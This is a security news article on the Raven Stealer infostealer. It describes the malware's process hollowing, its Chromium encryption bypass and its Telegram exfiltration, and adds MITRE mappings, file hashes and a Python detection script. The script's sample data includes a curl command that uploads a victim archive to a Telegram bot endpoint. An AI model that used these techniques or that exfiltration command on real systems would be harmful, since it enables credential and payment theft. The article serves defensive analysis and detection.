Raven Stealer Malware Exploits Telegram to Steal Logins, Payment Data, and Autofill Info

Raven Stealer has emerged as a sophisticated, lightweight information-stealing malware crafted in Delphi and C++, targeting Windows systems with a focus on extracting sensitive data such as logins, payment details, and autofill information from Chromium-based browsers like Chrome and Edge.

First spotted on GitHub on July 15, 2025, this malware operates with high stealth, requiring minimal user interaction while employing modular architecture for seamless deployment.

Promoted under the pretext of “educational use” via a Telegram channel named ZeroTrace, Raven Stealer integrates real-time exfiltration through Telegram bots, allowing even novice threat actors to orchestrate credential-harvesting campaigns.

Its compiled binaries, packed with UPX to reduce size and evade static detection, execute invisibly without UI elements, leveraging techniques like hidden windows and process hollowing to bypass defenses.

Figure: imported functions

According to Cyfirma's report, this positions Raven as a commodity tool in the malware-as-a-service (MaaS) space, with links to similar variants such as Octalyn Stealer from the same ZeroTrace Team, indicating a strategy of diversification to dominate low-tier illicit markets.

Technical Breakdown

Static analysis of samples like RavenStealer.exe (MD5: 6237a776e38b6a60229ac12fc6b21fb3) and v8Axs07p.3mf.exe (MD5: f74ec376aa22ce0b0d55023d8877dc72) reveals a Delphi-based builder GUI that embeds Telegram bot tokens and chat IDs directly into payloads, generating randomized 12-character filenames for stubs written in C++.

Figure: Analysis of v8Axs07p.3mf.exe

High entropy values confirm UPX packing, which complicates reverse engineering, while embedded resources store plaintext bot credentials under IDs 102 and 103.

The malware injects a ChaCha20-encrypted PAYLOAD_DLL into suspended browser processes using direct syscalls like NtAllocateVirtualMemory and NtWriteVirtualMemory, enabling reflective process hollowing without disk writes.

This bypasses Chromium’s App-Bound Encryption (ABE) by launching browsers in headless mode with flags like --no-sandbox and --disable-gpu, facilitating in-memory decryption of passwords, cookies, and payment data.

Dynamic analysis shows enumeration of system artifacts, including crypto wallets, VPN clients, and gaming platforms, with stolen data organized in %Local%RavenStealer subfolders before compression into ZIP archives suffixed with the victim’s username.

Exfiltration occurs via curl.exe invoking Telegram’s /sendDocument API, transmitting archives containing structured files like passwords.txt, cookies.txt, payment.txt, and screenshot.png for session hijacking and financial exploitation.

Mapped to MITRE ATT&CK, Raven employs tactics such as T1027 (Obfuscated Files or Information) for packing, T1564.003 (Hidden Window) for evasion, T1083 (File and Directory Discovery) for credential hunting, and T1071 (Application Layer Protocol) for C2 via Telegram, underscoring its comprehensive attack chain from execution to exfiltration.

Defensive Recommendations

The malware is attributed to the ZeroTrace Team, active on Telegram and GitHub since April 30, 2025; the developers maintain a hub for updates, tutorials, and variants, and use hardcoded author tags in source files such as RavenStealer.cpp.

This infrastructure replaces traditional C2 with Telegram’s anonymity for bot-driven data delivery.

Raven’s silent operation, modular design, and broad targeting of browsers, wallets, and services amplify its threat potential, urging defenses like monitoring for UPX-packed executables, anomalous browser launches, and Telegram API traffic.

Strategic mitigations include endpoint detection for syscall injections and behavioral analytics to counter virtualization evasion.
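Two of the monitoring points above, anomalous headless browser launches and curl.exe posting to Telegram's /sendDocument endpoint, can be turned into simple process-creation detections. The following is an added example written for this page, not code from the report or from Cyfirma; the event tuples are constructed samples and the Telegram bot token is a placeholder.

```python
import re

# Constructed sample process-creation events (image name, command line);
# illustrative only, not telemetry from the report.
SAMPLE_EVENTS = [
    ("curl.exe",
     "curl.exe -F chat_id=123456 -F document=@alice.zip "
     "https://api.telegram.org/bot000000:PLACEHOLDER_TOKEN/sendDocument"),
    ("chrome.exe",
     '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" '
     "--headless --no-sandbox --disable-gpu"),
    ("msedge.exe",
     '"C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" '
     "https://example.com"),
    ("curl.exe", "curl.exe -sSL https://example.com/update.json"),
]

# Telegram Bot API upload endpoint: https://api.telegram.org/bot<token>/sendDocument
TELEGRAM_SENDDOC = re.compile(r"api\.telegram\.org/bot[^/\s]+/sendDocument", re.I)
BROWSERS = {"chrome.exe", "msedge.exe"}
# Headless launch with sandbox and GPU disabled, the combination described
# for Raven's App-Bound Encryption bypass.
HEADLESS_FLAGS = {"--headless", "--no-sandbox", "--disable-gpu"}


def classify_event(image: str, cmdline: str) -> list[str]:
    """Return the names of the detections that fire for one process event."""
    hits = []
    img = image.lower()
    if img == "curl.exe" and TELEGRAM_SENDDOC.search(cmdline):
        hits.append("curl_telegram_sendDocument")
    if img in BROWSERS:
        flags = {tok.lower() for tok in cmdline.split() if tok.startswith("--")}
        # --headless may carry a value (e.g. --headless=new); compare on the key only.
        flags = {f.split("=", 1)[0] for f in flags}
        if HEADLESS_FLAGS <= flags:
            hits.append("headless_browser_sandbox_disabled")
    return hits


def scan(events) -> list[tuple[str, list[str]]]:
    """Run classify_event over a batch and keep only the events that fired."""
    findings = []
    for image, cmdline in events:
        hits = classify_event(image, cmdline)
        if hits:
            findings.append((image, hits))
    return findings


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

Legitimate automation (CI, PDF rendering) also launches headless browsers, so the second rule is a triage signal to be correlated with the parent process and with any following Telegram traffic, not a standalone verdict.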

Indicators of Compromise (IoCs)

No.  Indicator (SHA-256)                                               Type  Context
1    2e0b41913cac0828faeba29aebbf9e1b36f24e975cc7d8fa7f49212e867a3b38  EXE   RavenStealer.exe
2    28d6fbbdb99e6aa51769bde016c61228ca1a3d8c8340299e6c78a1e004209e55  EXE   v8Axs07p.3mf.exe
3    252fb240726d9590e55402cebbb19417b9085f08fc24c3846fc4d088e79c9da9  DLL   PAYLOAD_DLL.dll
